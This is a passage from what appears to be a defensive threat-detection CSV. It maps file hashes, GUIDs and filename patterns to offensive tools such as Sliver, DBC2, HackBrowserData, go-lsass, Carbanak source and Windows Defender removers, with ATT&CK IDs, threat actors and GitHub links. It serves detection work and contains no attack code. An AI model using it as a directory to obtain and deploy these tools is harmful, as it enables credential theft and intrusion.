fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40223" "*db40433bbaa08ed43bfaf5d3535372a95c7c10a5803bd9e1ec95157bb65ce6bd*",".{0,1000}db40433bbaa08ed43bfaf5d3535372a95c7c10a5803bd9e1ec95157bb65ce6bd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40224" "*db486e0cb94cf2bbe38173b7ce0eb02731ad9a435a04899a03d57b06cecddc4d*",".{0,1000}db486e0cb94cf2bbe38173b7ce0eb02731ad9a435a04899a03d57b06cecddc4d.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). 
It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","40225" "*db5670eac95bc3149f2cddd7cfe41b2bb35b6e8af8f101c86a68e8da6d2e02ff*",".{0,1000}db5670eac95bc3149f2cddd7cfe41b2bb35b6e8af8f101c86a68e8da6d2e02ff.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","40227" "*db5703e3f81ef1ebcff2242d0df019c926107d4d062617a76623d6e196285539*",".{0,1000}db5703e3f81ef1ebcff2242d0df019c926107d4d062617a76623d6e196285539.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","40228" "*db57df98645168a3896d882401bf1730ab0d5fe6821434503d3630d68c887893*",".{0,1000}db57df98645168a3896d882401bf1730ab0d5fe6821434503d3630d68c887893.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","40229" "*db5a054172dcde3aebfb86b08e3bf8992f9df3d22e2028fd5154c647e7361ceb*",".{0,1000}db5a054172dcde3aebfb86b08e3bf8992f9df3d22e2028fd5154c647e7361ceb.{0,1000}","offensive_tool_keyword","go-lsass","dumping LSASS 
process remotely","T1003 - T1055 - T1021.005","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/jfjallid/go-lsass","1","0","#filehash","N/A","9","1","38","5","2024-07-27T10:35:12Z","2023-11-30T18:45:51Z","40230" "*db5b21d5a66fadcebe25ed1bcac0cd5590a3afdf1e9d247a3d169ffcd0a78e62*",".{0,1000}db5b21d5a66fadcebe25ed1bcac0cd5590a3afdf1e9d247a3d169ffcd0a78e62.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40231" "*db5edbf21647b80f858790642c32e9c41884339b505d62ceebcfabb74a44db15*",".{0,1000}db5edbf21647b80f858790642c32e9c41884339b505d62ceebcfabb74a44db15.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","40234" "*db61c38755146ab83aa010beac56737f1f1efd74c61ebbb1876173e29fd1a2b8*",".{0,1000}db61c38755146ab83aa010beac56737f1f1efd74c61ebbb1876173e29fd1a2b8.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","40235" "*DB62BB65-0E29-4E95-BD4E-0AA543EF74B5*",".{0,1000}DB62BB65\-0E29\-4E95\-BD4E\-0AA543EF74B5.{0,1000}","offensive_tool_keyword","DRSAT","Disconnected RSAT is a launcher for the official Group Policy Manager - Certificate Authority and Certificate Templates snap-in to bypass the domain joined requirement that is needed when using the official MMC snap-in. The tool works by injecting a C# library into MMC that will hook the various API calls to trick MMC into believing that the logged on user is a domain user. attackers can abuse Disconnected RSAT to interact with Active Directory (AD) environments from non-domain-joined machines","T1559.001 - T1112 - T1078 - T1134.002 - T1055.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/DRSAT","1","0","#GUIDProject","N/A","6","3","233","25","2024-12-27T11:44:18Z","2024-09-04T16:35:02Z","40236" "*db62ef03d6be4778d3ec0fd2f6cb2cf030f02a70efa1f30850b27e0cefd50e9e*",".{0,1000}db62ef03d6be4778d3ec0fd2f6cb2cf030f02a70efa1f30850b27e0cefd50e9e.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","#filehash","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","40237" "*db65c744d5de72d0e727cf670e992aeec6e4e195298e71f22c095eb63df4f923*",".{0,1000}db65c744d5de72d0e727cf670e992aeec6e4e195298e71f22c095eb63df4f923.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential 
Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","40238" "*db6749f21079d875bf04af8c1eef3e2e8e2972818273c3032bd8c843f2d72cda*",".{0,1000}db6749f21079d875bf04af8c1eef3e2e8e2972818273c3032bd8c843f2d72cda.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","40239" "*db7c237e7fe7b5bed6b1d63082f21810eb2f0defdf2663de2e7871bb6f24472d*",".{0,1000}db7c237e7fe7b5bed6b1d63082f21810eb2f0defdf2663de2e7871bb6f24472d.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","40244" "*db7c868e3042fbf2138bf10e7dae3fb72f38a269a6337e87669829a416aa3109*",".{0,1000}db7c868e3042fbf2138bf10e7dae3fb72f38a269a6337e87669829a416aa3109.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","0","#filehash","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","40245" "*db7d3e12a58a102b76c1f6e041d0a464ccbffc346dbc338a8cb4a7e5ec508b6c*",".{0,1000}db7d3e12a58a102b76c1f6e041d0a464ccbffc346dbc338a8cb4a7e5ec508b6c.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","#filehash","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","40246" 
"*db81283e76c7ae80f00ecdedf6f46d92a8825b44819bac05c02bd64200a8a596*",".{0,1000}db81283e76c7ae80f00ecdedf6f46d92a8825b44819bac05c02bd64200a8a596.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","40248" "*db85afa956f0a0b6ec30c13259782a0759a5adb2f5dc01969068bb4137364d15*",".{0,1000}db85afa956f0a0b6ec30c13259782a0759a5adb2f5dc01969068bb4137364d15.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40249" "*DB8A345D-E19C-4C2A-9FDF-16BF4DD03717*",".{0,1000}DB8A345D\-E19C\-4C2A\-9FDF\-16BF4DD03717.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","#GUIDproject","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","40250" 
"*db8b7152534b483ed966cd9557bed083106b448feea5e06d6963c0bd7b282f40*",".{0,1000}db8b7152534b483ed966cd9557bed083106b448feea5e06d6963c0bd7b282f40.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","40251" "*db8d2fb1a43cab677fc796f9a67f37db52bde8a8778db7489903baad1b7ad29b*",".{0,1000}db8d2fb1a43cab677fc796f9a67f37db52bde8a8778db7489903baad1b7ad29b.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. 
This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","40252" "*db9b4df43af0a73b96453a0e6967720e794884f48abc60d3d8743309c3ae759b*",".{0,1000}db9b4df43af0a73b96453a0e6967720e794884f48abc60d3d8743309c3ae759b.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","40254" "*db9e318fce9098eb3ae55a782aee7f29667772302296b4e4924e0edb88e69560*",".{0,1000}db9e318fce9098eb3ae55a782aee7f29667772302296b4e4924e0edb88e69560.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40256" "*dba60efb94e99af6e6e52c487919380d59b6071b310f30ee0f29f50365c84f6d*",".{0,1000}dba60efb94e99af6e6e52c487919380d59b6071b310f30ee0f29f50365c84f6d.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","40258" "*DBAB7B9CC694FC37354E3A18F9418586172ED6660D8D205EAFFF945525A6A31A*",".{0,1000}DBAB7B9CC694FC37354E3A18F9418586172ED6660D8D205EAFFF945525A6A31A.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","#filehash","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","40260" "*DBAE6A6E-AE23-4DE9-9AB2-6A8D2CD59DEF*",".{0,1000}DBAE6A6E\-AE23\-4DE9\-9AB2\-6A8D2CD59DEF.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - 
TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","#GUIDproject","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","40261" "*dbb049e7216149b1723b7dbbf9e3e80ce4a0f2d78b2afa8b2cf451c1e5d97b91*",".{0,1000}dbb049e7216149b1723b7dbbf9e3e80ce4a0f2d78b2afa8b2cf451c1e5d97b91.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","#filehash","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","40262" "*dbb0f54089c689de684d365df493caae0d20771d4e486060087eaab5fd3f679e*",".{0,1000}dbb0f54089c689de684d365df493caae0d20771d4e486060087eaab5fd3f679e.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40263" "*dbbd6ee60a97e1647bf373b985b153cb8b19ab0f9809bf4eceae5d565e6edb02*",".{0,1000}dbbd6ee60a97e1647bf373b985b153cb8b19ab0f9809bf4eceae5d565e6edb02.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","40264" 
"*dbbe29d4095a98dbfc4e2ef1a26e0696f75930a04a274a2a207c0bd0296b7a24*",".{0,1000}dbbe29d4095a98dbfc4e2ef1a26e0696f75930a04a274a2a207c0bd0296b7a24.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","40265" "*dbc10feaef6ccaf49866bac8d3ddc48729e7163639d6e0fcdad9e8f90178896b*",".{0,1000}dbc10feaef6ccaf49866bac8d3ddc48729e7163639d6e0fcdad9e8f90178896b.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","40266" "*DBC2.git*",".{0,1000}DBC2\.git.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","40267" "*dbc2_agent.cs*",".{0,1000}dbc2_agent\.cs.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - 
TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","40268" "*dbc2_agent.exe*",".{0,1000}dbc2_agent\.exe.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","40269" "*dbc2Loader.dll*",".{0,1000}dbc2Loader\.dll.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","40270" "*dbc2Loader.exe*",".{0,1000}dbc2Loader\.exe.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","40271" "*dbc2Loader.tpl*",".{0,1000}dbc2Loader\.tpl.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - 
powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","40272" "*dbc2LoaderWrapperCLR.*",".{0,1000}dbc2LoaderWrapperCLR\..{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","40273" "*dbc2LoaderWrapperCLR_x64.dll*",".{0,1000}dbc2LoaderWrapperCLR_x64\.dll.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","40274" "*dbc2LoaderWrapperCLR_x86.dll*",".{0,1000}dbc2LoaderWrapperCLR_x86\.dll.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","40275" 
"*DBC2-master.zip*",".{0,1000}DBC2\-master\.zip.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","40276" "*dBCSPwd*aad3b435b51404eeaad3b435b51404ee*",".{0,1000}dBCSPwd.{0,1000}aad3b435b51404eeaad3b435b51404ee.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","N/A","9","2","139","17","2024-08-16T14:18:35Z","2023-09-05T12:13:47Z","40277" "*dbd58dba5d92e8d7b6c8dfc6fc54185c33ef8442c61e02f4448bf9641643e596*",".{0,1000}dbd58dba5d92e8d7b6c8dfc6fc54185c33ef8442c61e02f4448bf9641643e596.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","40278" "*dbd96cb386138d0f8215e5a6d0b6bc23aa23056385a1da5deac1b8134d6f157e*",".{0,1000}dbd96cb386138d0f8215e5a6d0b6bc23aa23056385a1da5deac1b8134d6f157e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous 
webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","40279" "*dbe6ffef155b82e83cf856b5bce79dab6f8f1fcec912274e7a96b477446e3717*",".{0,1000}dbe6ffef155b82e83cf856b5bce79dab6f8f1fcec912274e7a96b477446e3717.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","40282" "*dbeab309b7ecd219233a56c43b0c95f88a39c7d1d524d5f71d319a5928a2b5ad*",".{0,1000}dbeab309b7ecd219233a56c43b0c95f88a39c7d1d524d5f71d319a5928a2b5ad.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","40286" "*dbed4217e61d4deba7cfb5aa97aef6687507d9bd990110cc31b0d35ee32acada*",".{0,1000}dbed4217e61d4deba7cfb5aa97aef6687507d9bd990110cc31b0d35ee32acada.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential 
